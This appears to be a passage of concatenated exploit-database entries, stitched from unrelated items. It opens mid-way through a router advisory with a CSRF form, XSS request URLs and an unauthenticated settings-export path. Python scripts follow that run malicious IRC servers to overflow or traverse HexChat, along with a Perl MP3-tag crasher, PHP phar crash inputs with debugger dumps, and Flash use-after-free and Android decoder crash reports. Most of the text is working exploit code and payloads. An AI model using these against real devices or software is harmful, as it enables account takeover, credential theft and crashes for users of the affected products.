<input type="hidden" name="l2tpGateway" value="192.168.1.254"
/>
<input type="hidden" name="l2tpOPMode" value="KeepAlive" />
<input type="hidden" name="l2tpRedialPeriod" value="60" />
<input type="hidden" name="pptpServer" value="pptp_server" />
<input type="hidden" name="pptpUser" value="pptp_user" />
<input type="hidden" name="pptpPass" value="pptp_passwd" />
<input type="hidden" name="pptpMode" value="0" />
<input type="hidden" name="pptpIp" value="192.168.1.1" />
<input type="hidden" name="pptpNetmask" value="255.255.255.0"
/>
<input type="hidden" name="pptpGateway" value="192.168.1.254"
/>
<input type="hidden" name="pptpOPMode" value="KeepAlive" />
<input type="hidden" name="pptpRedialPeriod" value="60" />
<input type="hidden" name="APN3G" value="" />
<input type="hidden" name="PIN3G" value="" />
<input type="hidden" name="Dial3G" value="" />
<input type="hidden" name="User3G" value="3groot" /> < -- 3G
User
<input type="hidden" name="Password3G" value="3gr00t" /> <-- 3G
Password
<input type="hidden" name="Dev3G" value="Auto" />
<input type="hidden" name="macCloneEnbl" value="0" />
<input type="hidden" name="macCloneMac" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
II. Stored Cross-site Scripting (CWE-79)
``````````````````````````````````````````````````````````
"Wide Area Network (WAN) Settings"
# PocParameter: "hostname"
http://{airpenXweb}/goform/setWan?connectionType=DHCP&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=&staticPriDns=&staticSecDns=xxx.xxx.xxx.xxx&hostname=[
* STOREDXSS
*]&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=
"Webs URL Filter Settings"
# PocParameter: "addURLFilter"
http://{airpenXweb}/goform/websURLFilter?addURLFilter=[ *STOREDXSS*
]&addwebsurlfilter=Add
Request in this page will show a pop-up with a content of javascript
payload:
http://{airpenXweb}/firewall/content_filtering.asp
# Parameter: "addHostFilter"
http://{airpenXweb}/goform/websHostFilter?addHostFilter=[ *STOREDXSS*
]&addwebscontentfilter=Add
III. Reflected Cross-Site Scripting (CWE-79)
``````````````````````````````````````````````````````````````
Virtually all application inputs are vulnerable to cross-site scripting,
since it is not carried out any validation of the data provided by the
user.
Bellow are some examples:
"Basic Wireless Settings"
# PocParameter: "mssid_0"
http://{airpenXweb}/goform/wirelessBasic?radiohiddenButton=2&wifihiddenButton=2&wirelessmode=9&bssid_num=1&mssid_0=[*
XSS *
]&mssid_1=&mssid_2=&mssid_3=&mssid_4=&mssid_5=&mssid_6=&mssid_8=&mssid_9=&mssid_10=&mssid_11=&mssid_12=&mssid_13=&mssid_14=&mssid_15=&broadcastssid=1&apisolated=0&mbssidapisolated=0&sz11gChannel=1&n_mode=0&n_bandwidth=1&n_gi=1&n_mcs=33&n_rdg=1&n_extcha=1&n_stbc=1&n_amsdu=0&n_autoba=1&n_badecline=0&n_disallow_tkip=1&n_2040_coexit=1&tx_stream=1&rx_stream=1
# PocParameter: "ssid"
http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=[ * XSS *
]&security_mode=Disable&wzsecureAlgorithm=AES
# PocParameter: "hostname"
http://{airpenXweb}/goform/setWan?connectionType=[ -*- XSS
-*-]&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=xxx.xxx.xxx.xxx&staticPriDns=xxx.xxx.xxx.xxx5&staticSecDns=203.185.0.36&hostname=tiat&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=%3Cscript%3Ealert%281%29%3C/script%3E&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=
# Parameter: "admpass"
http://{airpenXweb}/goform/setSysAdm?admuser=root&admpass=[ -*- XSS -*- ]
IV. Insecure Direct Request
````````````````````````````````````````
This device allows remote attackers to obtain sensitive information,
including all credentials available via direct request to
/cgi-bin/ExportSettings.sh.
PoC:
http://{airpenXweb}/cgi-bin/ExportSettings.sh
V. Insecure Default Permissions (CWE-276)
``````````````````````````````````````````````````````````````
In the device description (on the Vendor's site) it is very clear that the
priority is to
facilitate everything for you, including setting. Therefore it is not
mandatory that a password
is configured for the web interface and not to connect to the AP, this way
you can find hundreds
of these completely unprotected APs.
VI. No SSL
``````````````````
Any action, whether sensitive or not is transmitted in plain text because
HTTPS is not used and no step.
POST /goform/setSysAdm HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101
Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/adm/management.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
admuser=ORWL_user&admpass=ORWL_pass
Timeline
=======
2015-10-25 - Issues discovered
2015-11-04 - Vendor contacted
2015-12-12 - Another attempt to contact the Vendor...
2016-02-26 - Public Disclosure
* There is no easy way to contact the vendor. Emails sent remain unanswered
and forms site contacts as well.
#!/usr/bin/python
#
####################
# Meta information #
####################
# Exploit Title: Hexchat IRC client - CAP LS Handling Stack Buffer Overflow
# Date: 2016-02-07
# Exploit Author: PizzaHatHacker
# Vendor Homepage: https://hexchat.github.io/index.html
# Software Link: https://hexchat.github.io/downloads.html
# Version: 2.11.0
# Tested on: HexChat 2.11.0 & Linux (64 bits) + HexChat 2.10.2 & Windows 8.1 (64 bits)
# CVE : CVE-2016-2233
#############################
# Vulnerability description #
#############################
'''
Stack Buffer Overflow in src/common/inbound.c :
void inbound_cap_ls (server *serv, char *nick, char *extensions_str, const message_tags_data *tags_data)
In this function, Hexchat IRC client receives the available extensions from
the IRC server (CAP LS message) and constructs the request string to indicate
later which one to use (CAP REQ message).
This request string is stored in the fixed size (256 bytes) byte array
'buffer'. It has enough space for all possible options combined, BUT
it will overflow if some options are repeated.
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Base Score : 7.5
Impact Subscore : 6.4
Exploitability Subscore : 10
'''
####################
# Proof of Concept #
####################
'''
* Install Hexchat IRC Client
* Run this Python script on a (server) machine
* Connect to the server running the script
* Results : Hexchat will crash (most probably access violation/segmentation fault)
'''
import socket
import sys
import time
# Exploit configuration
HOST = ''
PORT = 6667
SERVERNAME = 'irc.example.com'
OPTIONS = 'multi-prefix ' * 100 # 13*100 = 1300 bytes > 256 bytes
# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind((HOST, PORT)) # Bind to port
sock.listen(0) # Start listening on socket
print 'Server listening, waiting for connection...'
conn, addr = sock.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...'
conn.send(':' + SERVERNAME + ' CAP * LS :' + OPTIONS + '\r\n')
# Wait and close socket
conn.recv(256)
sock.close()
print 'Done.'
except socket.error as msg:
print 'Network error : ' + str(msg[0]) + ' ' + msg[1]
#!/usr/bin/python
#
####################
# Meta information #
####################
# Exploit Title: Hexchat IRC client - Server name log directory traversal
# Date: 2016-01-26
# Exploit Author: PizzaHatHacker
# Vendor Homepage: https://hexchat.github.io/index.html
# Software Link: https://hexchat.github.io/downloads.html
# Version: 2.11.0
# Tested on: HexChat 2.11.0 & Linux (64 bits)
# CVE : CVE-2016-2087
#############################
# Vulnerability description #
#############################
'''
Server Name Directory Traversal in src/common/text.c :
static char * log_create_pathname (char *servname, char *channame, char *netname)
In this function, channame (channel name) and netname (network name as
configured in the client software) are sanitized to prevent directory
traversal issues when creating a logfile BUT servname (server-provided
information) is NOT sanitized before possibly being injected into
the file path via the 'log_insert_vars' function call.
This bug could be triggered in the special (non-default) configuration
where a user would have :
* Enabled logging (Settings > Preferences > Chatting > Logging)
* Used a pattern containing '%s' in the log filepath (instead
of the default = '%n\%c.log').
When connecting to a malicious server, Hexchat IRC client may create or modify
arbitrary files on the filesystem with the permissions of the IRC client user
(non-root). For example, the following directories are accessible easily :
* <Hexchat-Conf>/addons : Executable plugin files that are automatically loaded
when starting Hexchat IRC client
* <Hexchat-Conf>/logs : ALL logfiles (from other servers too)
* <Hexchat-Conf>/scrollback : Scrollback text that is automatically
loaded when entering a channel/server (this may trigger further bugs)
* <Hexchat-Conf>/sounds : Sounds that may be played on demand via CTCP
SOUND messages (this could also trigger further bugs)
* etc.
CVSS v2 Vector : (AV:N/AC:H/Au:N/C:N/I:P/A:P)
CVSS Base Score : 4
Impact Subscore : 4.9
Exploitability Subscore : 4.9
'''
####################
# Proof of Concept #
####################
'''
* Install Hexchat IRC Client
* Settings > Preferences > Chatting > Logging : Enable logging and use the log
filepath pattern : '%s\%c.log' (without the quotes)
* Run this Python script on a (server) machine
* Connect to the server running the script
* Results : A 'PIZZA' directory will appear in <Hexchat-Conf>/PIZZA instead
of something like <Hexchat-Conf>/logs/___PIZZA
'''
import socket
import sys
import time
# Exploit configuration
HOST = ''
PORT = 6667
SERVERNAME = '../PIZZA'
# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind((HOST, PORT)) # Bind to port
sock.listen(0) # Start listening on socket
print 'Server listening, waiting for connection...'
conn, addr = sock.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...'
conn.send(':' + SERVERNAME + ' 001 bob :Welcome to the Internet Relay Network\r\n')
# Wait and close socket
conn.recv(256)
sock.close()
print 'Done.'
except socket.error as msg:
print 'Failure binding to port : ' + str(msg[0]) + ' ' + msg[1]
# Exploit Title: Xion Audio Player <= 1.5 (build 160) - Crash PoC
# Date: 01-04-2016
# Software Link: http://www.r2.com.au/downloads/files/xion-audio-player-v1.5b160.zip
# Homepage: http://www.xionplayer.com/
# Exploit Author: Charley Celice (stmerry)
# Contact: https://twitter.com/charleycelice
#
# Category: Crash PoC
# Tested on: Windows XP SP3 English
# Details: Overflowing title/artist tags on an *.mp3 seems to crash the software.
# (works on both standalone/portable versions)
use MP3::Tag;
$mp3 = MP3::Tag->new('legit.mp3'); # whatever mp3 you got handy
$mp3->title_set('A' x 5000); # title/artist tags
$mp3->artist_set('A' x 5000); # may vary although both seems to be needed
$mp3->update_tags();
$mp3->close();
print "[*] Completed.\n";
# Exploit Title: Invalid memory write in phar on filename with \0 in name
# Date: 2016-03-19
# Exploit Author: @vah_13
# Vendor Homepage: https://secure.php.net/
# Software Link: https://github.com/php/php-src
# Version: 5.5.33
# Tested on: Linux
Test script:
---------------
cat test.php
-------------------
<?php
$testfile = file_get_contents($argv[1]);
try {
$phar = new Phar($testfile);
$phar['index.php'] = '<?php echo "https://twitter.com/vah_13 ?>';
$phar['index.phps'] = '<?php echo "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"; ?>';
$phar->setStub('<?php
Phar::webPhar();
__HALT_COMPILER(); ?>');
} catch (Exception $e) {
print $e;
}?>
----------------------------------------------------------------------------------
PoC 1
root@TZDG001:/tmp/data2# base64 ret/crash13
CkTJu4AoZHKCxhC7KlDNp2g5Grx7JE092+gDAADJVR1EZS8vL/oAAPovLy8v5y8vLy9lZWVlZWVl
DAwMC+MMDAwMDM4MDAwgBwwMDAwMDAxQDC8uLi8jLy88Ly8u+C8vLxERERERERERpXRDbnQgdGhh
dCBtVnJrV3h4eHh4eNt4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4ePh4Ly8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLkYvLy8vLy8vLy8vLy9kJy8vLy8vLy8vLy8v8+TzMZovLysvLy8vL3l5eXl5
eXl5eXkpIHsEAAYgICAveHh4eHh4eHh4eAF4AAJ4eP8vIExvYWQgY29tbWFuZChTgG5lIHV0aWxp
dHkKICAgIGluY2yKZGUuLi4uLi4uLi4uPCYuLi4ucG1kLnBoYXIudmVKCiAgJCAvLyBSdegDIGxp
bmUgTW50ZXJmYWxlCiAgIBxleGkAAP//SFBNRFxUZXh0VUl5Q29tbWFuZAAANwAAAHNyY1Rf/39N
UElMRVIodjsgPz4MChAAAAANAgAAEP//+QEAAAAAAAAiAAAqAAAAlnJjL21haW4vlA8uLlEvci8u
LhAA2GVzZXRzL2NsZWFucipeTUxSZW5kZXLJYEC2IQAAAABjb3JlrgAAAAAAI2OcwrYAAAAAAA0A
NwAAAHMASRwAc2V0cy91bndzcmMAnjgjW7gwgAAAcmMAAgAAADN1bGVzZXRzL2MgAAAAb///f/9p
YWwueG1s4BIAAB+u4VZzcmMvbWFpbi9yZXNvdXJpZ24ueABzcmMvbQA9dr2itiEASRyXl5eXl5eX
l5etl5eXlwAMc3JjL21hW24v6Bvzb3VyY2VzL3J1//+AAHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0
dHR0dHR0WWV0cy9uYRwcMBwcHBwcHBwcAB+u4TSoCwD1A3lvdXJjZXMvdmVsb2Qxmi9LZ01yAB+u
4RgAACCu4VbjDy5nLnhtbP8vAC4uLjwmLnh4eHh4eHh4eHh4+HgZLy8vLi4ucG1kLnBoL3Jlc291
cmNjZXNzcgCAAAAuGnVzc3IvLg0AAHFF7BMAc3JjL/9haW4vcGhwL1BIUE1EL1BhcnMnJycnJycn
JycnJycnJyfnAAAKQ5bxci5waHBtGAAAH67hGAAAH67hVuMPLi5RLy8vLy8vc3JW4QcAANevurC2
IQAAAAcAACwvdXNyLy4uL1KHAK78Vm4vcGhwL1BIUE1EL1JlbmRlcmVyKl5NTFJlbmRlcslgQLYh
AAAAAAAAGwABAHNyYy9tYWluL3BoNy9QSFBNRC9SdVRlLnCAcDIYAAAfruEAAHNyYy9tYWluL3AA
iy0AAABzcmMAAFeu4VYwCAAAPXa9oi8vLy8vLy8vLy8vLy8vLy8vL28v8+TzOoAAAGhwL1D/CzpE
ZXZlbG9kMZovbmdNZXRob2QQcGiKlgwAIAAAAFb8BQAAI2OcwrYhAAAAACAANwAAAGNyYy9tYc7O
zs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs4AEa7hVnNyYy+A////L9YhzLYhAADg////MXBo
cC9QSFBNRC9PdW1hf24vcGhwL1BIUGFEUFBQUFBQUFByYy9tYWluL3BocC9QSFBNRC9SdWxML0Rl
c2lnZy9Ub29PYW55TWV0aG9kfy4fruFWYy9tYWluL3BocC9QSFBNRC9SdWxlL0Rlc2lnbi8vRGV2
ZWxvZFxlbnRDbwMAAGMvbQA9dr2itiEASRwAcG1kLnARruFWjwUF//8FcIWYAAIAAAAvLi4v////
/3JILi4vLi91c3IvLi4AADYAAABecmMvUEhQTUQvUnVsZS9EZXNpZ1svV2VpAGhwAAAAc3JjLy8v
LwAAAQDk8zGaLy//L1J1bGUvRJCQkJBAkJCQkJDQkJBzkJCQkJCQkJCQkJCQkJCQkG50cm9w6HAu
LgAAAQAuLi4uLi4uLi4uL1BIUE1EL091bWFpdi9waHAvUEhQTURlcgAEQ2hpbGRyZW4ucGhwbQsA
AB+u4VZ+BQAAgLP4+7Yh3////wAOAAAfruxWbQYAADplbi4vdf//Ly4u5i4vdQBkHwAD6AAD6AAN
ADcuLhAA2DUAAAAyAAAAc3JkLy8uLi8uL1Jzci4vdXNycGguUS8vLy9/AAAAL3Vzci+uQi8uL3Vz
ci8vLi98c3IvLhciLi91c3IvLi4vdXOALy4uL/////9ldHMvYyAAAABv//9//2lhbC54tbW1tbW1
tbW1tbW1vABjL+ZJTnUgZC4vc5QPAAAEAHIvLi4vdXNyLy4uLy4vdXNyLy4AZC4vAQAAAC4uL3UQ
AC8uLi8uL3Vzby4vdXNyDy4uUS8vLy8vL3NyLy4vc3IvLi4odXNyAAIAAC4vdXNzci8uLi91e3Iv
rkIvLmRvci9hdRAA2DVXu7YhABcuL3Vzci8uAS8u
(gdb) r test.php ret/crash13
Starting program: /tmp/php-7.0.4/sapi/cli/php test.php ret/crash13
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
zend_string_init (persistent=0, len=2, str=0x121a64c "->") at
/tmp/php-7.0.4/Zend/zend_string.h:157
157 zend_string *ret = zend_string_alloc(len, persistent);
(gdb) i r
rax 0xae6572 11429234
rbx 0x7fffffffa880 140737488332928
rcx 0x64c 1612
rdx 0x2 2
rsi 0x3 3
rdi 0xae658a 11429258
rbp 0x2 0x2
rsp 0x7fffffffa7e0 0x7fffffffa7e0
r8 0xfffffffffffffffb -5
r9 0x1 1
r10 0x3 3
r11 0x1214fc0 18960320
r12 0x1206b7a 18901882
r13 0x4 4
r14 0x121a64c 18982476
r15 0x7fffffffa880 140737488332928
rip 0xd531b4 0xd531b4 <add_assoc_string_ex+116>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
*****************************************************************
PoC 2
root@dns:~/php-src# base64 ./bck_out/6648
Ly4vdXNyLy4uLy4vdXNy4uLi4uLi4uLi4uLi4uLi4uLi4uLit7e3t7dhI1VmbH8AIGdsb1Rh/39i
b25ziGFudCB0AYCAIG1QX1CKRQAAgABFQVMsJywgJ3BoYXInKXNfLy4uLy4vU3NyLy4uL31zci8u
LjwuL3Vzci8ubWFxUGhhciggJ3Bokm1kLnBoYXIAAAB/CgovL4iInoiIiIiIiIh1Li9//+ggQ29u
ZmlndXJcB2lCY2x1ZC91c3IvLoiJiIiIiKKIiIiIXFxcXFxHXFxcXFxcXFxcXFxciA0uL3VzcmUg
cC8uLi91c3IvLi4uL3MQLy4ULxEvgHNyNiBpbmNsdWQv9G8gdXNcIHRoaXMgcGhhctlzZXRfaW5j
iYgmMSYmJiY4/e3t7WFyI2VmaW5lIGdsb1T/FhYWFhYWFhYWFhYWFhYWFhYWFhYWaGFyJyk7Co5k
ZV9wYXRoKCkpOxYKaWYgKGlzjn+UKCRhcmV2KSAmJiByZWEvdXNyLy4QLy4vdXNyLy4uL31zci8u
LjwuL3Vzci8u5i91c3IvLi4vLi91c3IuLj0ndXNyLy4uEADJci8uJi8uL3VzEC9AEhwuL3NyLy4u
L3Vzci8uLi8uL2lziz4uLi8uL3Vzci8oLi91bmNsdWQvdVNyLy6IiIikiIiIcwAgLi5y3zouLy4v
JiYmJlMmJiYmOBDt7e0=
./bck_out/6648
==4103== Source and destination overlap in memcpy(0x6e5d800, 0x6e5d798, 291)
==4103== at 0x4C2D75D: memcpy@@GLIBC_2.14 (vg_replace_strmem.c:915)
==4103== by 0x6AD1B5: _estrdup (zend_alloc.c:2558)
==4103== by 0x6880FD: php_stream_display_wrapper_errors (streams.c:152)
==4103== by 0x68AE4B: _php_stream_opendir (streams.c:1994)
==4103== by 0x5E986A: spl_filesystem_dir_open (spl_directory.c:236)
==4103== by 0x5ED77F: spl_filesystem_object_construct (spl_directory.c:724)
==4103== by 0x6C1655: zend_call_function (zend_execute_API.c:878)
==4103== by 0x6EBF92: zend_call_method (zend_interfaces.c:103)
==4103== by 0x5A44A8: zim_Phar___construct (phar_object.c:1219)
==4103== by 0x75D143: ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER
(zend_vm_execute.h:1027)
==4103== by 0x70CFBA: execute_ex (zend_vm_execute.h:423)
==4103== by 0x76D496: zend_execute (zend_vm_execute.h:467)
==4103==
==4103== Invalid read of size 8
==4103== at 0x6ACEC3: zend_mm_alloc_small (zend_alloc.c:1291)
==4103== by 0x6ACEC3: zend_mm_alloc_heap (zend_alloc.c:1362)
==4103== by 0x6ACEC3: _emalloc (zend_alloc.c:2446)
==4103== by 0x6DC4E0: zend_hash_real_init_ex (zend_hash.c:140)
==4103== by 0x6DC4E0: zend_hash_check_init (zend_hash.c:163)
==4103== by 0x6DC4E0: _zend_hash_add_or_update_i (zend_hash.c:563)
==4103== by 0x6DC4E0: _zend_hash_str_update (zend_hash.c:667)
==4103== by 0x6D21FE: zend_symtable_str_update (zend_hash.h:407)
==4103== by 0x6D21FE: add_assoc_str_ex (zend_API.c:1384)
==4103== by 0x6E8AA6: zend_fetch_debug_backtrace
(zend_builtin_functions.c:2670)
==4103== by 0x6EDB3A: zend_default_exception_new_ex (zend_exceptions.c:213)
==4103== by 0x6D1DBA: _object_and_properties_init (zend_API.c:1311)
==4103== by 0x429178: zend_throw_exception (zend_exceptions.c:877)
==4103== by 0x4292A5: zend_throw_error_exception (zend_exceptions.c:910)
==4103== by 0x42639C: php_error_cb (main.c:1041)
==4103== by 0x427F4B: zend_error (zend.c:1163)
==4103== by 0x426FFD: php_verror (main.c:897)
==4103== by 0x427306: php_error_docref1 (main.c:921)
==4103== Address 0x5c5c5c5c5c5c5c5c is not stack'd, malloc'd or
(recently) free'd
==4103==
==4103==
==4103== Process terminating with default action of signal 11 (SIGSEGV)
==4103== General Protection Fault
==4103== at 0x6ACEC3: zend_mm_alloc_small (zend_alloc.c:1291)
==4103== by 0x6ACEC3: zend_mm_alloc_heap (zend_alloc.c:1362)
==4103== by 0x6ACEC3: _emalloc (zend_alloc.c:2446)
==4103== by 0x6DC4E0: zend_hash_real_init_ex (zend_hash.c:140)
==4103== by 0x6DC4E0: zend_hash_check_init (zend_hash.c:163)
==4103== by 0x6DC4E0: _zend_hash_add_or_update_i (zend_hash.c:563)
==4103== by 0x6DC4E0: _zend_hash_str_update (zend_hash.c:667)
==4103== by 0x6D21FE: zend_symtable_str_update (zend_hash.h:407)
==4103== by 0x6D21FE: add_assoc_str_ex (zend_API.c:1384)
==4103== by 0x6E8AA6: zend_fetch_debug_backtrace
(zend_builtin_functions.c:2670)
==4103== by 0x6EDB3A: zend_default_exception_new_ex (zend_exceptions.c:213)
==4103== by 0x6D1DBA: _object_and_properties_init (zend_API.c:1311)
==4103== by 0x429178: zend_throw_exception (zend_exceptions.c:877)
==4103== by 0x4292A5: zend_throw_error_exception (zend_exceptions.c:910)
==4103== by 0x42639C: php_error_cb (main.c:1041)
==4103== by 0x427F4B: zend_error (zend.c:1163)
==4103== by 0x426FFD: php_verror (main.c:897)
==4103== by 0x427306: php_error_docref1 (main.c:921)
Segmentation fault
Program received signal SIGSEGV, Segmentation fault. zend_mm_alloc_small
(size=<optimized out>, bin_num=16, heap=0x7ffff6000040) at
/root/php_bck/Zend/zend_alloc.c:1291 1291 heap->free_slot[bin_num] =
p->next_free_slot; (gdb) i r rax 0x5c5c5c5c5c5c5c5c 6655295901103053916 rbx
0x8 8 rcx 0x10 16 rdx 0x7ffff60000c0 140737320583360 rsi 0x10 16 rdi 0x120
288 rbp 0x7ffff6000040 0x7ffff6000040 rsp 0x7fffffffa230 0x7fffffffa230 r8
0xf74460 16204896 r9 0x7ffff6013170 140737320661360 r10 0x0 0 r11 0x101 257
r12 0x7ffff605c658 140737320961624 r13 0x7ffff605c640 140737320961600 r14
0x7ffff60561f8 140737320935928 r15 0x8439b8 8665528 rip 0x6acec3 0x6acec3
<_emalloc+115> eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0
es 0x0 0 fs 0x0 0 gs 0x0 0
https://bugs.php.net/bug.php?id=71860
https://twitter.com/vah_13
https://twitter.com/ret5et
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=451
If Color.setTransform is set to a transform that deletes the field it is called on, a UaF occurs. A PoC is as follows:
var tf:TextField = this.createTextField("tf",1,1,1,4,4)
var n = new Object();
n.valueOf = function () {
trace("here");
tf.removeTextField()
}
var o = {ra: n, rb:8};
var c = new Color(tf)
c.setTransform(o)
A sample swf and fla are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39652.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=523
The attached file causes a crash in ih264d_process_intra_mb in avc parsing, likely due to incorrect bounds checking in one of the memcpy or memset calls in the method.
The file crashes with the following stack trace in M:
09-08 15:51:01.212 8488 8951 F libc : Fatal signal 11 (SIGSEGV), code 1, fault addr 0x0 in tid 8951 (le.h264.decoder)
09-08 15:51:01.313 198 198 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
09-08 15:51:01.313 198 198 F DEBUG : Build fingerprint: 'google/hammerhead/hammerhead:6.0/MRA58G/2228996:userdebug/dev-keys'
09-08 15:51:01.313 198 198 F DEBUG : Revision: '0'
09-08 15:51:01.313 198 198 F DEBUG : ABI: 'arm'
09-08 15:51:01.313 198 198 F DEBUG : pid: 8488, tid: 8951, name: le.h264.decoder >>> /system/bin/mediaserver <<<
09-08 15:51:01.313 198 198 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0
09-08 15:51:01.317 796 938 W NativeCrashListener: Couldn't find ProcessRecord for pid 8488
09-08 15:51:01.322 198 198 F DEBUG : r0 ad7877e0 r1 b21cabf8 r2 00000001 r3 00000220
09-08 15:51:01.322 198 198 E DEBUG : AM write failed: Broken pipe
09-08 15:51:01.322 198 198 F DEBUG : r4 000000c5 r5 0000000a r6 00000000 r7 00000005
09-08 15:51:01.322 198 198 F DEBUG : r8 b3098400 r9 b21cabf8 sl 00000001 fp 00000220
09-08 15:51:01.322 198 198 F DEBUG : ip b3099bbc sp ad7876a0 lr b1c38ab7 pc 00000000 cpsr 200d0010
09-08 15:51:01.329 198 198 F DEBUG :
09-08 15:51:01.329 198 198 F DEBUG : backtrace:
09-08 15:51:01.329 198 198 F DEBUG : #00 pc 00000000 <unknown>
09-08 15:51:01.329 198 198 F DEBUG : #01 pc 00018ab5 /system/lib/libstagefright_soft_avcdec.so (ih264d_process_intra_mb+2544)
09-08 15:51:01.329 198 198 F DEBUG : #02 pc 0000de03 /system/lib/libstagefright_soft_avcdec.so (ih264d_recon_deblk_slice+610)
09-08 15:51:01.329 198 198 F DEBUG : #03 pc 0000e0b9 /system/lib/libstagefright_soft_avcdec.so (ih264d_recon_deblk_thread+64)
09-08 15:51:01.329 198 198 F DEBUG : #04 pc 0003f3e7 /system/lib/libc.so (__pthread_start(void*)+30)
09-08 15:51:01.329 198 198 F DEBUG : #05 pc 00019b43 /system/lib/libc.so (__start_thread+6)
09-08 15:51:01.627 198 198 F DEBUG :
09-08 15:51:01.627 198 198 F DEBUG : Tombstone written to: /data/tombstones/tombstone_02
It crashes with the following trace in L:
W/NativeCrashListener( 2256): Couldn't find ProcessRecord for pid 26174
I/DEBUG ( 6837): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
E/DEBUG ( 6837): AM write failure (32 / Broken pipe)
I/DEBUG ( 6837): Build fingerprint: 'google/shamu/shamu:5.1.1/LYZ28K/2168912:user/release-keys'
I/DEBUG ( 6837): Revision: '33696'
I/DEBUG ( 6837): ABI: 'arm'
I/DEBUG ( 6837): pid: 26174, tid: 7029, name: le.h264.decoder >>> /system/bin/mediaserver <<<
I/DEBUG ( 6837): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0
I/DEBUG ( 6837): r0 0000000f r1 ffffffff r2 af2e286c r3 00000007
I/DEBUG ( 6837): r4 af2e286c r5 00000010 r6 00000000 r7 00000000
I/DEBUG ( 6837): r8 0d452c00 r9 af2fc9c8 sl a36c81f7 fp 1e1a8a58
I/DEBUG ( 6837): ip ffffffff sp af2e2840 lr 0000000f pc af2ea8f0 cpsr 800c0010
I/DEBUG ( 6837):
I/DEBUG ( 6837): backtrace:
I/DEBUG ( 6837): #00 pc 000078f0 /system/lib/libstagefright_soft_h264dec.so
I/DEBUG ( 6837): #01 pc 0000000d <unknown>
I/DEBUG ( 6837):
I/DEBUG ( 6837): Tombstone written to: /data/tombstones/tombstone_09
To reproduce the issue, download the attached file, and wait for it to be thumbnailed. This can be triggered by opening the downloads folder in the Photos application.
Reported to Android here: https://code.google.com/p/android/issues/detail?id=185644
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39651.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=581
There is a use-after-free in the TextField.maxChars setter. If the maxChars the field is set to is an object with valueOf defined, the valueOf function can free the field's parent object, which is then used. A minimal PoC is as follows:
var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.maxChars = {valueOf : func};
function func(){
if (times == 0){
times++;
return 7;
}
mc.removeMovieClip();
// Fix heap here
return 7;
}
A sample swf and fla are attached.
Proof of Concept:
